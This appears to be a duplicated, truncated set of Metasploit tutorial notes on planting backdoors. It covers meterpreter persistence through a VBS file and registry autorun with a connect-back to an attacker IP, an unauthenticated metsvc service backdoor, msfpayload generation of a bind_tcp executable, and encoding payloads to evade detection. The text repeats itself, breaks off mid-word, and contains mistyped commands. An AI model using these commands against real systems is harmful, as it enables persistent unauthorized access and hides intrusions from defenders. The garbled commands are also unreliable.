Metasploit Backdoor Tutorial
Backdoor:
Create persistence backdoor
Can be configured to connect back on systemboot or user login
Time can be set between connect back attemps
Under the hood
Create vbs file on the victim and excute it
Add registry entries so it is autorun
Can be uninstalled remotely
Vbs file delete manually
meterpreter > run persistence
meterpreter > run persistence -A -U -i 10 -p 3000 -r 192.168.1.10
Metsvc backdoor
Run as service on the victim
Connect to it remotely
No authentication required
Can be remotely unintalled
File need delete manually
Less noisy compared to persistence
Attacker can connect when he wants
Can be found by portscaning
Demo: Backdoor with Metsvc
Create Executable from payloads
Msfpayload
Use: msfpayload [var=val] [S]umamry|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecuate|[D]ll|[V]BA|[W]ar;
Ex:
msfpayload windows/meterprete/bind_tcp RHOST=192.168.1.100 X | bind_tcp.exe
Encoding to obfucate payload
Encode payload to eavde detection
Encode payloa…
Create persistence backdoor
Can be configured to connect back on systemboot or user login
Time can be set between connect back attemps
Under the hood
Create vbs file on the victim and excute it
Add registry entries so it is autorun
Can be uninstalled remotely
Vbs file delete manually
meterpreter > run persistence
meterpreter > run persistence -A -U -i 10 -p 3000 -r 192.168.1.10
Metsvc backdoor
Run as service on the victim
Connect to it remotely
No authentication required
Can be remotely unintalled
File need delete manually
Less noisy compared to persistence
Attacker can connect when he wants
Can be found by portscaning
Demo: Backdoor with Metsvc
Create Executable from payloads
Msfpayload
Use: msfpayload [var=val] [S]umamry|[C]|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecuate|[D]ll|[V]BA|[W]ar;
Ex:
msfpayload windows/meterprete/bind_tcp RHOST=192.168.1.100 X | bind_tcp.exe
Encoding to obfucate payload
Encode payload to eavde detection
Encode payloa…
